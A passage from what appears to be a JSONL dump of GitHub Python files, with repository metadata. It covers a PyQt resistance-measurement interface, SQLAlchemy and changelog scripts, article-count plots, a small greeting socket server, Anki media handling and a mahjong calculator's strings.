self.R4_wybor_kanalow_t.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.R4_wybor_kanalow_t.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.R4_wybor_kanalow_t.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.R4_wybor_kanalow_t.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.R4_wybor_kanalow_t.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.R4_wybor_kanalow_t.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.R4_wybor_kanalow_t.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.R4_wybor_kanalow_tekst_p.setText(_translate(\"MainWindow\", \"Wybór kanału\"))\n self.R4_zakres_p.setCurrentText(_translate(\"MainWindow\", \"100 R\"))\n self.R4_zakres_p.setItemText(0, _translate(\"MainWindow\",\"100 R\"))\n self.R4_zakres_p.setItemText(1, _translate(\"MainWindow\",\"1 k\"))\n self.R4_zakres_p.setItemText(2, _translate(\"MainWindow\", \"10 k\"))\n self.R4_zakres_p.setItemText(3, _translate(\"MainWindow\", \"100 k\"))\n self.R4_zakres_p.setItemText(4, _translate(\"MainWindow\", \"1 M\"))\n self.R4_zakres_p.setItemText(5, _translate(\"MainWindow\", \"10 M\"))\n self.R4_zakres_p.setItemText(6, _translate(\"MainWindow\", \"100 M\")) \n\n self.R4_skala_log_p.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.R4_tempo_tekst.setText(_translate(\"MainWindow\", \"Tempo przyrostu temperatury [K/min.]:\"))\n self.R4_czestotliowsc_tekst.setText(_translate(\"MainWindow\", \"Częstotliwość próbkowania [s]\"))\n self.R4_sledzenie_temp_tekst.setText(_translate(\"MainWindow\", \"Automatyczne śledzenie temperatury [K]\"))\n self.R4_zakres_tekst.setText(_translate(\"MainWindow\", \"Zakres:\"))\n self.R4_moc_tekst.setText(_translate(\"MainWindow\", \"Moc grzałki [%]:\"))\n self.R4_wybor_kanalow_tekst_t.setText(_translate(\"MainWindow\", \"Wybór kanału\"))\n self.R4_wybor_kanalow_p.setCurrentText(_translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_p.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.R4_wybor_kanalow_p.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.R4_wybor_kanalow_p.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.R4_wybor_kanalow_p.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.R4_wybor_kanalow_p.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.R4_wybor_kanalow_p.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.R4_wybor_kanalow_p.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.R4_wybor_kanalow_p.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.R4_wybor_kanalow_p.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.R4_wybor_kanalow_p.setItemText(9, _translate(\"MainWindow\", \"10\"))\n\n self.R4_moc.setText(_translate(\"MainWindow\", \"0\"))\n self.R4_wybor_osix_tekst_p.setText(_translate(\"MainWindow\", \"Dane osi X:\"))\n self.R4_skala_log_t.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.R4_temperatura_tekst.setText(_translate(\"MainWindow\", \"Aktualna temperatura [K]:\"))\n self.R4_start.setText(_translate(\"MainWindow\", \"Start\"))\n self.R4_reset.setText(_translate(\"MainWindow\", \"Reset\"))\n self.R4_licznik.setText(_translate(\"MainWindow\", \"00:00\"))\n #--------------->\n\n\n #<----tryb reczny--- \n self.label_1.setText(_translate(\"MainWindow\", \"Kanał 1\"))\n self.comboBox_1.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_1.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_11.setText(_translate(\"MainWindow\", \"Kanał 11\"))\n self.comboBox_11.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_11.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_2.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_2.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Kanał 2\"))\n self.label_12.setText(_translate(\"MainWindow\", \"Kanał 12\"))\n self.comboBox_12.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_12.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Kanał 3\"))\n self.comboBox_3.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_3.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_13.setText(_translate(\"MainWindow\", \"Kanał 13\"))\n self.comboBox_13.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_13.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Kanał 4\"))\n self.comboBox_4.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_4.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_14.setText(_translate(\"MainWindow\", \"Kanał 14\"))\n self.comboBox_14.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_14.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_5.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_5.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Kanał 5\"))\n self.comboBox_15.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_15.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_15.setText(_translate(\"MainWindow\", \"Kanał 15\"))\n self.comboBox_6.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_6.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_6.setText(_translate(\"MainWindow\", \"Kanał 6\"))\n self.label_16.setText(_translate(\"MainWindow\", \"Kanał 16\"))\n self.comboBox_16.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_16.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_7.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_7.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_7.setText(_translate(\"MainWindow\", \"Kanał 7\"))\n self.label_17.setText(_translate(\"MainWindow\", \"Kanał 17\"))\n self.comboBox_17.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_17.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_8.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_8.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_8.setText(_translate(\"MainWindow\", \"Kanał 8\"))\n self.label_18.setText(_translate(\"MainWindow\", \"Kanał 18\"))\n self.comboBox_18.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_18.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.comboBox_9.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_9.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_9.setText(_translate(\"MainWindow\", \"Kanał 9\"))\n self.comboBox_19.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_19.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_19.setText(_translate(\"MainWindow\", \"Kanał 19\"))\n self.comboBox_10.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_10.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.label_10.setText(_translate(\"MainWindow\", \"Kanał 10\"))\n self.label_20.setText(_translate(\"MainWindow\", \"Kanał 20\"))\n self.comboBox_20.setItemText(0, _translate(\"MainWindow\", \"Napięcie [v]\"))\n self.comboBox_20.setItemText(1, _translate(\"MainWindow\", \"Opór [Ohm]\"))\n self.CH20_skala_log.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.CH20_czestotliowsc_in_tekst.setText(_translate(\"MainWindow\", \"Okres między kanałami [s]\"))\n self.CH20_czestotliowsc_out_tekst.setText(_translate(\"MainWindow\", \"Okres między seriami [s]\"))\n self.CH20_start.setText(_translate(\"MainWindow\", \"Start\"))\n self.CH20_reset.setText(_translate(\"MainWindow\", \"Reset\"))\n self.CH20_licznik.setText(_translate(\"MainWindow\", \"00:00\"))\n #----------------->\n \n #<--------------inne-----------\n self.zmiana_trybu.setItemText(0, _translate(\"MainWindow\", \"Pomiar oporu w funkcji temeperatury\"))\n self.zmiana_trybu.setItemText(1, _translate(\"MainWindow\", \"Pomiar 4-punktowy\"))\n self.zmiana_trybu.setItemText(2, _translate(\"MainWindow\", \"Ręczny\"))\n self.zmiana_trybu_tekst.setText(_translate(\"MainWindow\", \"Tryb: \"))\n self.naglowek.setText(_translate(\"MainWindow\", \"Nazwa_pomiaru\"))\n self.nazwa_pliku_tekst.setText(_translate(\"MainWindow\", \"Nazwa pliku wyjściowego:\"))\n self.nazwa_pliku_przedrostek.setText(_translate(\"MainWindow\", \"data_\"))\n self.Ustawienia.setText(_translate(\"MainWindow\", \"Ustawienia\"))\n self.Pomoc.setText(_translate(\"MainWindow\", \"Pomoc\"))\n #--------->\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())","repo_name":"Ukasz-Witkowski/pomiar_oporu","sub_path":"program/interfejs.py","file_name":"interfejs.py","file_ext":"py","file_size_in_byte":81513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7156098621","text":"#!/usr/bin/python3\n\"\"\"\nPYTHON OBJECT RELATIONAL MAPPING MODULE\n\nmodel_state_insert module provides function to add an State object to the DB.\n\"\"\"\n\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\ndef model_state_insert():\n \"\"\"\n Adds the State object “Louisiana” to the database.\n\n Takes 3 arguments: mysql username, mysql password and database name.\n \"\"\"\n\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1], sys.argv[2], sys.argv[3]), pool_pre_ping=True)\n Base.metadata.create_all(engine)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n new_state = State()\n new_state.name = 'Louisiana'\n session.add(new_state)\n session.commit()\n print(new_state.id)\n\n session.close()\n\n\nif __name__ == \"__main__\":\n model_state_insert()\n","repo_name":"gorgyboy/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/11-model_state_insert.py","file_name":"11-model_state_insert.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27473297399","text":"import enum\n\nimport click\nimport numpy as np\nimport pandas as pd\n\n\n@enum.unique\nclass Area(enum.Enum):\n core = 'core'\n tests = 'tests'\n build = 'build'\n apps = 'apps'\n docs = 'docs'\n\n\ndef define_area(msg):\n areas = [e.value for e in Area]\n\n for area in areas:\n if msg.startswith(f'[{area}] '):\n return area\n\n return np.NaN\n\n\ndef delete_prefix(msg):\n prefixes = [f'[{e.value}] ' for e in Area]\n\n for prefix in prefixes:\n if msg.startswith(prefix):\n return msg[len(prefix):]\n\n return msg[:]\n\n\ndef write_into_changelog(df, f):\n f.write('\\n')\n for _, row in df.iterrows():\n f.write(f\"\\n{row['commit']} {row['message']}\")\n f.write('\\n')\n\n\n@click.command()\n@click.argument(\n 'git_log',\n type=click.Path(exists=True)\n)\ndef main(git_log):\n \"\"\" Script designed to create changelog out of .csv SRT git log \"\"\"\n\n df = pd.read_csv(git_log, sep = '|', names = ['commit', 'message', 'author', 'email'])\n df['area'] = df['message'].apply(define_area)\n df['message'] = df['message'].apply(delete_prefix)\n\n core = df[df['area']=='core']\n tests = df[df['area']=='tests']\n build = df[df['area']=='build']\n apps = df[df['area']=='apps']\n docs = df[df['area']=='docs']\n other = df[df['area'].isna()]\n\n with open('changelog.md', 'w') as f:\n f.write('# Release Notes\\n')\n\n f.write('\\n## Changelog\\n')\n f.write('\\n
Click to expand/collapse')\n f.write('\\n

')\n f.write('\\n')\n\n if not core.empty:\n f.write('\\n### Core Functionality')\n write_into_changelog(core, f)\n\n if not tests.empty:\n f.write('\\n### Unit Tests')\n write_into_changelog(tests, f)\n\n if not build.empty:\n f.write('\\n### Build Scripts (CMake, etc.)')\n write_into_changelog(build, f)\n\n if not apps.empty:\n f.write('\\n### Sample Applications')\n write_into_changelog(apps, f)\n\n if not docs.empty:\n f.write('\\n### Documentation')\n write_into_changelog(docs, f)\n\n if not other.empty:\n f.write('\\n### Other')\n write_into_changelog(other, f)\n\n f.write('\\n

')\n f.write('\\n
')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hwangsaeul/libsrt","sub_path":"scripts/changelog/changelog.py","file_name":"changelog.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"14624948087","text":"\n#%%\n\n# ---> Clear all items in memory:\n\nprint(\"\\nClearing all data in memory...\")\n\nfrom IPython import get_ipython\nget_ipython().magic('reset -f')\n\n\n#%%\n\n\n# -----------------------------------------------------------------------------\n### ----------------------------- Cargar paquetes -----------------------------\n# -----------------------------------------------------------------------------\n\n\n#%% \n\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\nimport time\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\n\n\n\nstart_time = time.time()\n\n\nprint(\"\\nStarting program...\")\n\n\n#%%\n\n# 1) ---> Definir parametros:\n \n \nuser = r\"\\srjc2\"\n\nnombre_base = \"\\\\WS - Consolidado articulos.xlsx\"\n\npath = r\"C:\\Users\" + user + r\"\\OneDrive\\Documentos\\GitHub\\MCPP_juan.salgado\\Proyecto final\"\n\npath_base = path + r\"\\0_Base_consolidada\"\n\npath_nlp = path + r\"\\2_NLP\"\n\noutput = path + r\"\\3_Output\"\n\n\ndf = pd.read_excel(path_nlp + r\"\\merge_bases.xlsx\")\n\ndf2 = pd.read_excel(path_base + r\"\\WS - Consolidado articulos.xlsx\")\n\ndf['day'] = 1\n\ndf.rename(columns={\"Anio\": \"year\", \"Mes\": \"month\"}, inplace = True)\n\ndf = df[df.year != 2019]\n\ndf['date'] = pd.to_datetime(df[['year', 'month', 'day']])\n\n\n#%%\n\n# ---> Analisis de los articulos\n\n# 1) ---> Articulos por dia\n\ngrouped_dates = df.groupby(df['date'].apply(lambda x : x.date()))\n\ngrouped_dates = grouped_dates['date'].aggregate(len)\n\n#grouped_dates.plot.line()\n\nax = grouped_dates.plot(color = \"chocolate\")\n\n# _ = plt.xticks(rotation=90, )\n_ = plt.grid()\n_ = plt.xlabel('Años')\n_ = plt.ylabel('Cantidad articulos')\n_ = plt.title('Total articulos recopilados')\n_ = plt.rc('xtick', labelsize=6)\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 10,\n 'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_1.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 2) ---> Articulos por medio\n\ngrouped_medios = df2.groupby(['Medio']).size()\n\nax = grouped_medios.sort_values(ascending=True).plot(color = \"darkcyan\",\n kind='barh')\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.grid()\n_ = plt.xlabel('Cantidad articulos')\n_ = plt.ylabel('Medios')\n_ = plt.title('Total articulos por medio')\n_ = plt.rc('xtick', labelsize=6)\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 10,\n 'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_2.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 2) ---> Articulos por palabra\n\ngrouped_pals = df2.groupby(['Palabra buscada']).size()\n\nax = grouped_pals.sort_values(ascending=True).plot(color = \"y\",\n kind='barh')\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.tight_layout()\n_ = plt.grid()\n_ = plt.xlabel('Cantidad articulos')\n#_ = plt.ylabel('Palabra buscada')\n#_ = plt.title('Total articulos por palabra buscada')\n_ = plt.rc('xtick', labelsize=6)\n\ny_axis = ax.axes.get_yaxis()\ny_label = y_axis.get_label()\ny_label.set_visible(False)\n\nx_axis = ax.axes.get_xaxis()\nx_label = x_axis.get_label()\nx_label.set_visible(False)\n\n\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 10,\n 'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_3.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 4) ---> Descripcion crimenes\n\ncrimes = ['Violenciasexual', 'Homicidio', 'Hurto',\n 'Extorsion', 'Secuestro', 'date']\n\ncrimes2 = ['Violenciasexual', 'Homicidio', 'Hurto',\n 'Extorsion', 'Secuestro']\n\ndf_crimes = df[crimes]\n\ngrouped_crimes = df_crimes.groupby('date').sum()\n\ngrouped_crimes.reset_index(inplace=True)\n\nax = grouped_crimes.plot(x=\"date\", y=crimes2)\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.tight_layout()\n_ = plt.grid()\n_ = plt.xlabel('Años')\n_ = plt.ylabel('Cantidad articulos')\n#_ = plt.title('Total articulos clasificados en crimenes')\n_ = plt.rc('xtick', labelsize=6)\n\n\ny_axis = ax.axes.get_yaxis()\ny_label = y_axis.get_label()\ny_label.set_visible(False)\n\n\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 7,\n 'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_4.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n#%%\n# 4) ---> Descripcion crimenes\n\ncrimes = ['Venezolano', 'Crimenorganizado', 'date']\n\ncrimes2 = ['Venezolano', 'Crimenorganizado']\n\ndf_crimes = df[crimes]\n\ngrouped_crimes = df_crimes.groupby('date').sum()\n\ngrouped_crimes.reset_index(inplace=True)\n\nax = grouped_crimes.plot(x=\"date\", y=crimes2)\n\n#_ = plt.xticks(rotation=13, )\n_ = plt.tight_layout()\n_ = plt.grid()\n_ = plt.xlabel('Años')\n_ = plt.ylabel('Cantidad articulos')\n#_ = plt.title('Total articulos clasificados en crimenes')\n_ = plt.rc('xtick', labelsize=6)\n\n\ny_axis = ax.axes.get_yaxis()\ny_label = y_axis.get_label()\ny_label.set_visible(False)\n\n\n_ = plt.rc('ytick', labelsize=6)\nparams = {'legend.fontsize': 7,\n 'legend.handlelength': 1.3}\n_ = plt.rcParams.update(params)\n\npdf = PdfPages(output + '\\\\graph_5.pdf')\n\npdf.savefig()\n\npdf.close()\n\n\n\n\n","repo_name":"juansalg/MCPP_juan.salgado","sub_path":"Proyecto final/2_NLP/Codigos/4. Graficos.py","file_name":"4. Graficos.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31758878873","text":"import socket\r\n\r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nhost='192.168.0.103'\r\nport = 8000\r\ns.bind((' ',port))\r\ns.listen(1000)\r\nclients =[]\r\nmsg=\"Thanks for connecting to this server\"\r\n\r\n\r\nprint(\"Listening for connections....\")\r\nwhile True:\r\n c,addr = s.accept()\r\n print(addr,\" connected\")\r\n clients.append(addr)\r\n c.send(msg.encode())\r\n \r\n \r\n\r\n\r\ns.close()\r\n\r\n","repo_name":"winsecurity/python","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"74403406954","text":"__docformat__ = 'restructuredtext'\n\nimport os, stat, time, shutil, re, sys, urllib2\nfrom anki.db import *\nfrom anki.facts import Fact\nfrom anki.utils import addTags, genID, ids2str, checksum\nfrom anki.lang import _\n\nregexps = ((\"(\\[sound:([^]]+)\\])\",\n \"[sound:%s]\"),\n (\"(]+)[\\\"']? ?/?>)\",\n \"\"))\n\n# Tables\n##########################################################################\n\nmediaTable = Table(\n 'media', metadata,\n Column('id', Integer, primary_key=True, nullable=False),\n Column('filename', UnicodeText, nullable=False),\n Column('size', Integer, nullable=False),\n Column('created', Float, nullable=False),\n Column('originalPath', UnicodeText, nullable=False, default=u\"\"),\n Column('description', UnicodeText, nullable=False, default=u\"\"))\n\nclass Media(object):\n pass\n\nmapper(Media, mediaTable)\n\nmediaDeletedTable = Table(\n 'mediaDeleted', metadata,\n Column('mediaId', Integer, ForeignKey(\"cards.id\"),\n nullable=False),\n Column('deletedTime', Float, nullable=False))\n\n# Helper functions\n##########################################################################\n\ndef mediaFilename(path):\n \"Return checksum.ext for path\"\n new = checksum(open(path, \"rb\").read())\n ext = os.path.splitext(path)[1].lower()\n return \"%s%s\" % (new, ext)\n\ndef copyToMedia(deck, path):\n \"\"\"Copy PATH to MEDIADIR, and return new filename.\nUpdate media table. If file already exists, don't copy.\"\"\"\n origPath = path\n description = os.path.splitext(os.path.basename(path))[0]\n newBase = mediaFilename(path)\n new = os.path.join(deck.mediaDir(create=True), newBase)\n # copy if not existing\n if not os.path.exists(new):\n if new.lower() == path.lower():\n # case insensitive filesystems suck\n os.rename(path, new)\n else:\n shutil.copy2(path, new)\n newSize = os.stat(new)[stat.ST_SIZE]\n if not deck.s.scalar(\n \"select 1 from media where filename = :f\",\n f=newBase):\n # if the user has modified a hashed file, try to remember the old\n # filename\n old = deck.s.scalar(\n \"select originalPath from media where filename = :s\",\n s=os.path.basename(origPath))\n if old:\n origPath = old\n description = os.path.splitext(os.path.basename(origPath))[0]\n try:\n path = unicode(path, sys.getfilesystemencoding())\n except TypeError:\n pass\n deck.s.statement(\"\"\"\ninsert into media (id, filename, size, created, originalPath,\ndescription)\nvalues (:id, :filename, :size, :created, :originalPath,\n:description)\"\"\",\n id=genID(),\n filename=newBase,\n size=newSize,\n created=time.time(),\n originalPath=origPath,\n description=description)\n deck.flushMod()\n return newBase\n\ndef _modifyFields(deck, fieldsToUpdate, modifiedFacts, dirty):\n factIds = ids2str(modifiedFacts.keys())\n if fieldsToUpdate:\n deck.s.execute(\"update fields set value = :val where id = :id\",\n fieldsToUpdate)\n deck.s.statement(\n \"update facts set modified = :time where id in %s\" %\n factIds, time=time.time())\n ids = deck.s.all(\"\"\"select cards.id, cards.cardModelId, facts.id,\nfacts.modelId from cards, facts where\ncards.factId = facts.id and facts.id in %s\"\"\"\n % factIds)\n deck.updateCardQACache(ids, dirty)\n deck.flushMod()\n\n\ndef mediaRefs(string):\n \"Return list of (fullMatch, filename, replacementString).\"\n l = []\n for (reg, repl) in regexps:\n for (full, fname) in re.findall(reg, string):\n l.append((full, fname, repl))\n return l\n\ndef stripMedia(txt):\n for (reg, x) in regexps:\n txt = re.sub(reg, \"\", txt)\n return txt\n\n# Rebuilding DB\n##########################################################################\n\ndef rebuildMediaDir(deck, deleteRefs=False, dirty=True):\n \"Delete references to missing files, delete unused files.\"\n localFiles = {}\n modifiedFacts = {}\n unmodifiedFacts = {}\n renamedFiles = {}\n existingFiles = {}\n factsMissingMedia = {}\n updateFields = []\n usedFiles = {}\n unusedFileCount = 0\n missingFileCount = 0\n deck.mediaDir(create=True)\n deck.startProgress(16, 0, _(\"Check Media DB\"))\n # rename all files to checksum versions, note non-renamed ones\n deck.updateProgress(_(\"Checksum files...\"))\n files = os.listdir(unicode(deck.mediaDir()))\n mod = len(files) / 10\n for c, oldBase in enumerate(files):\n if mod and not c % mod:\n deck.updateProgress()\n if oldBase.startswith(\"latex-\"):\n continue\n oldPath = os.path.join(deck.mediaDir(), oldBase)\n if oldBase.startswith(\".\"):\n continue\n if os.path.isdir(oldPath):\n continue\n newBase = copyToMedia(deck, oldPath)\n if oldBase.lower() == newBase.lower():\n existingFiles[oldBase] = 1\n else:\n renamedFiles[oldBase] = newBase\n deck.updateProgress(value=10)\n # now look through all fields, and update references to files\n deck.updateProgress(_(\"Scan fields...\"))\n for (id, fid, val) in deck.s.all(\n \"select id, factId, value from fields\"):\n oldval = val\n for (full, fname, repl) in mediaRefs(val):\n if fname in renamedFiles:\n # renamed\n newBase = renamedFiles[fname]\n val = re.sub(re.escape(full), repl % newBase, val)\n usedFiles[newBase] = 1\n elif fname in existingFiles:\n # used & current\n usedFiles[fname] = 1\n else:\n # missing\n missingFileCount += 1\n if deleteRefs:\n val = re.sub(re.escape(full), \"\", val)\n else:\n factsMissingMedia[fid] = 1\n if val != oldval:\n updateFields.append({'id': id, 'val': val})\n modifiedFacts[fid] = 1\n else:\n if fid not in factsMissingMedia:\n unmodifiedFacts[fid] = 1\n # update modified fields\n deck.updateProgress(_(\"Modify fields...\"))\n if modifiedFacts:\n _modifyFields(deck, updateFields, modifiedFacts, dirty)\n # fix tags\n deck.updateProgress(_(\"Update tags...\"))\n if dirty:\n deck.deleteTags(unmodifiedFacts.keys(), _(\"MediaMissing\"))\n if deleteRefs:\n deck.deleteTags(modifiedFacts.keys(), _(\"MediaMissing\"))\n else:\n deck.addTags(factsMissingMedia.keys(), _(\"MediaMissing\"))\n # build cache of db records\n deck.updateProgress(_(\"Delete unused files...\"))\n mediaIds = dict(deck.s.all(\"select filename, id from media\"))\n # look through the media dir for any unused files, and delete\n for f in os.listdir(unicode(deck.mediaDir())):\n if f.startswith(\".\"):\n continue\n if f.startswith(\"latex-\"):\n continue\n path = os.path.join(deck.mediaDir(), f)\n if os.path.isdir(path):\n shutil.rmtree(path)\n continue\n if f in usedFiles:\n del mediaIds[f]\n else:\n os.unlink(path)\n unusedFileCount += 1\n deck.updateProgress(_(\"Delete stale references...\"))\n for (fname, id) in mediaIds.items():\n # maybe delete from db\n if id:\n deck.s.statement(\"delete from media where id = :id\", id=id)\n deck.s.statement(\"\"\"\ninsert into mediaDeleted (mediaId, deletedTime)\nvalues (:id, strftime('%s', 'now'))\"\"\", id=id)\n # update deck and save\n deck.flushMod()\n deck.save()\n deck.finishProgress()\n return missingFileCount, unusedFileCount - len(renamedFiles)\n\n# Download missing\n##########################################################################\n\ndef downloadMissing(deck):\n from anki.latex import renderLatex\n urls = dict(\n deck.s.all(\"select id, features from models where features != ''\"))\n if not urls:\n return None\n mdir = deck.mediaDir(create=True)\n os.chdir(mdir)\n deck.startProgress()\n missing = {}\n for (id, fid, val, mid) in deck.s.all(\"\"\"\nselect fields.id, factId, value, modelId from fields, facts\nwhere facts.id = fields.factId\"\"\"):\n # add latex tags\n val = renderLatex(deck, val, False)\n for (full, fname, repl) in mediaRefs(val):\n if not os.path.exists(os.path.join(mdir, fname)) and mid in urls:\n missing[fname] = mid\n success = 0\n for c, file in enumerate(missing.keys()):\n deck.updateProgress(label=_(\"Downloading %(a)d of %(b)d...\") % {\n 'a': c,\n 'b': len(missing),\n })\n try:\n data = urllib2.urlopen(urls[missing[file]] + file).read()\n open(file, \"wb\").write(data)\n success += 1\n except:\n pass\n deck.finishProgress()\n return len(missing), success\n\n# Export original files\n##########################################################################\n\ndef exportOriginalFiles(deck):\n deck.startProgress()\n origDir = deck.mediaDir(create=True)\n newDir = origDir.replace(\".media\", \".originals\")\n try:\n os.mkdir(newDir)\n except (IOError, OSError):\n pass\n cnt = 0\n for row in deck.s.all(\"select filename, originalPath from media\"):\n (fname, path) = row\n base = os.path.basename(path)\n if base == fname:\n continue\n cnt += 1\n deck.updateProgress(label=\"Exporting %s\" % base)\n old = os.path.join(origDir, fname)\n new = os.path.join(newDir, base)\n if os.path.exists(new):\n new = re.sub(\"(.*)(\\..*?)$\", \"\\\\1-%s\\\\2\" %\n os.path.splitext(fname)[0], new)\n shutil.copy2(old, new)\n deck.finishProgress()\n return cnt\n","repo_name":"zw/libanki","sub_path":"anki/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":9997,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"17860676548","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python3\n#python 3.7.2 3.7.3\n\n\"\"\"\ntranslated by Hu Xiangyou on February 22, 2019\ntranslated by Hu Xiangyou on June 6, 2019\n\"\"\"\ntitle=\"Maajang Keisanki\"\n\nask_input_tehai=\"Tehai o nyuuryoku\"\nhelp=\"README.md o goran kudasai\"\nlanguage_switched=\"Gengo wa Rooma-ji ni henkou-saremashita\"\nhas_0=\"「0」 fukumi. 「5」 to shimashita\"\nhas_0m=\"「0m」 fukumi. 「5m」 to shimashita\"\nhas_0p=\"「0p」 fukumi. 「5p」 to shimashita\"\nhas_0s=\"「0s」 fukumi. 「5s」 to shimashita\"\nhas_invalid_input=\"Mukou na nyuuryoku\"\nlow_speed=\"Tehai ga oo-sugi. Zokkou-shite mo yoroshii desu ka? (Chokusetsu Entaa-kii o oshite 